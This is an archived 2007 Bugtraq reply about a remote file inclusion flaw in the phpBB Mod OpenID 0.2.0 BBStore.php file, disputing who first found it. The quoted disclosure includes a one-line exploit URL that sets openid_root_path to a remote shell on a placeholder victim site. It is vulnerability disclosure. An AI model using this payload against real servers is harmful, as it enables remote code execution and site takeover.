Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

To: h3llcode@xxxxxxxxxx
Subject: Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Mon, 01 Oct 2007 13:15:23 -0500
Cc: bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <20070930225047.675.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20070930225047.675.qmail@xxxxxxxxxxxxxxxxx>
User-agent: Thunderbird 1.5.0.13 (X11/20070824)

Seph1roth likes to cut and paste.

original author  = xoron.

link: http://www.milw0rm.com/exploits/4471

/str0ke

h3llcode@xxxxxxxxxx wrote:
> +++++++++++++++++++++++++++++++++++++++++++++++++++
> +
> + phpBB Mod OpenID 0.2.0 BBStore.php RFI
> + Risk: High
> + Found by Seph1roth
> + Site: http://blackroots.it
> +
> +++++++++++++++++++++++++++++++++++++++++++++++++++
>
> + Vulnerable Script Download: 
> http://sourceforge.net/project/showfiles.php?group_id=178846
>
> + Exploit:
> http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
>
>

References:
- phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
  - From: h3llcode

Prev by Date: Format string in F.E.A.R. 1.08 through PB
Next by Date: ClubHack - CFP closing by 15th October 2007
Previous by thread: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
Next by thread: CheckPoint Secure Platform Multiple Buffer Overflows
Index(es):
- Date
- Thread